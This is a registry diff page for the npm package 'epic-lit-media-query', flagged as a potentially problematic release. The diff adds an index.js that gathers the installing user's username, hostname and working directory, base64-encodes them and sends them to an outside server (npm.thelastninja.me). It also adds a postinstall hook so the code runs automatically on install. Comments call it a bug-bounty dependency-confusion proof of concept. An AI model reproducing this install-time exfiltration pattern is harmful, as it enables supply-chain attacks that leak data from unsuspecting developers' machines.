epic-lit-media-query 0.0.1-security → 2.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of epic-lit-media-query might be problematic. Click here for more details.
- package/index.js +33 -0
- package/package.json +19 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
|
|
4
|
+
// This is a proof-of-concept package that is part of a Bug Bounty compaign for Epic Games
|
|
5
|
+
// Please note that this is not a malicious package, it is meant only as demonstration for dependency confusion
|
|
6
|
+
// It collects username, hostname and current path and submits them to a remote server to demonstrate impact
|
|
7
|
+
// For any inquiries please reach out to: thelastninja@wearehackerone.com
|
|
8
|
+
|
|
9
|
+
async function sendUserInfoToLogging() {
|
|
10
|
+
try {
|
|
11
|
+
const userInfo = os.userInfo();
|
|
12
|
+
const hostname = os.hostname();
|
|
13
|
+
const currentPath = process.cwd();
|
|
14
|
+
|
|
15
|
+
// Combine user and host information
|
|
16
|
+
const userInfoString = `${userInfo.username}@${hostname}:${currentPath}`;
|
|
17
|
+
|
|
18
|
+
// Base64 encode the combined string
|
|
19
|
+
const encodedUserInfo = Buffer.from(userInfoString).toString('base64');
|
|
20
|
+
|
|
21
|
+
// Construct the URL with encoded user information
|
|
22
|
+
const url = `http://npm.thelastninja.me/logging?user_info=${encodedUserInfo}`;
|
|
23
|
+
|
|
24
|
+
// Send a GET request to the logging endpoint
|
|
25
|
+
const response = await http.get(url);
|
|
26
|
+
|
|
27
|
+
} catch (error) {
|
|
28
|
+
console.error('Error sending user info to logging:', error.message);
|
|
29
|
+
}
|
|
30
|
+
}
|
|
31
|
+
|
|
32
|
+
// Call the function to send user info to logging
|
|
33
|
+
sendUserInfoToLogging();
|
package/package.json
CHANGED
|
@@ -1,6 +1,22 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "epic-lit-media-query",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "2.0.1",
|
|
4
|
+
"description": "This is a poc package for bug bounty dependency confusion test, it only collects basic info to demonstrate impact to the triage team",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"postinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"repository": {},
|
|
11
|
+
"keywords": [
|
|
12
|
+
"poc"
|
|
13
|
+
],
|
|
14
|
+
"author": "thelastninja@wearehackerone.com",
|
|
15
|
+
"license": "MIT",
|
|
16
|
+
"bugs": {
|
|
17
|
+
"url": "https://hackerone.com/thelastninja"
|
|
18
|
+
},
|
|
19
|
+
"homepage": "https://hackerone.com/thelastninja",
|
|
20
|
+
"dependencies": {
|
|
21
|
+
}
|
|
6
22
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=epic-lit-media-query for more information.
|